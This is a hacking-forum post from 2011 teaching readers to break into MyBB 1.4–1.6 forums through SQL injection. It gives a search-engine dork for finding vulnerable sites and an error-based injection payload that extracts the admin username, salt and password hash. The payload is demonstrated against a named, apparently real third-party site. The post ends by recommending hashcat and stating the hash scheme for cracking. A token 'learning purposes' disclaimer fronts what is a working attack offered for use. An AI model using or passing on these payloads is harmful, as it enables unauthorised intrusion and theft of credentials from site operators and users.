Hacking Forums

এখানে আপনার নাম এবং ইমেলএড্রেস দিয়ে রেজিস্ট্রেশন করুন অথবা নাম এবং পাসওয়ার্ড দিয়ে লগইন করুন

ALL RIGHTS REVERSE ENGINEERED

Welcome To Our Going Up Registered Members

    How to hack MyBB forums. 1.4 - 1.6

    Share
    avatar
    faroque
    Administrator
    Administrator

    Posts : 11
    Join date : 13/12/2011

    How to hack MyBB forums. 1.4 - 1.6

    Post by faroque on Tue Dec 13, 2011 12:52 pm

    This
    thread was made for learning purposes only, any black hat activities
    that involves this method is on your own risk, I'm not responsible for
    your actions.


    First of all we've got to find a vulnerable.
    Google this:


    Code: [Select all]

    inurl:"index.php?tab=" intext:"MyBB"


    Find a site that's vulnerable.
    How to test if the site is vulnerable:

    Code: [Select all]

    http://Target.com/index.php?tab=8'


    If the site is vulnerable, you should get a mySQL error like this one:



    Now you have a vulnerable MyBB forum, now it's time to hack it, paste the following code into the browser:

    Code: [Select all]

    and(select
    1 from(select count(*),concat((select username from mybb_users where
    uid=1),floor(Rand(0)*2))a from information_schema.tables group by
    a)b)-- -


    I found this vulnerable site:
    Code: [Select all]

    http://download4all.in/index.php?tab=3'


    So this is how it should be in your browser:
    Code: [Select all]

    http://download4all.in/index.php?tab=3'
    and(select 1 from(select count(*),concat((select username from
    mybb_users where uid=1),floor(Rand(0)*2))a from
    information_schema.tables group by a)b)-- -


    Now you'll see the username, like this:



    Username can be found here



    So the admin username is:

    Code: [Select all]

    Admin1


    Now we have to get the Salt, so paste the following thing into your browser:

    Code: [Select all]

    http://download4all.in/index.php?tab=3'
    and(select 1 from(select count(*),concat((select salt from mybb_users
    where uid=1),floor(Rand(0)*2))a from information_schema.tables group by
    a)b)-- -


    Now you'll see this:



    So the salt is:
    Code: [Select all]

    7JFqQhFk1


    Now we have to get the admin password:

    Code: [Select all]

    http://download4all.in/index.php?tab=3'
    and(select 1 from(select count(*),concat((select password from
    mybb_users where uid=1),floor(Rand(0)*2))a from
    information_schema.tables group by a)b)-- -


    Now you'll see this:



    The password is encrypted, you can use hashcat to decrypt it.
    Mybb password hashing method is md5(md5($salt).md5($pass)).


    How to search for vulnerabilities in a certain MyBB forum.
    Code: [Select all]

    site:http://target.com inurl:"index.php?tab="


    So for example:
    Code: [Select all]

    site:http://download4all.in inurl:"index.php?tab="


    Hope You Like My Tutorial

      Current date/time is Fri Apr 27, 2018 9:25 am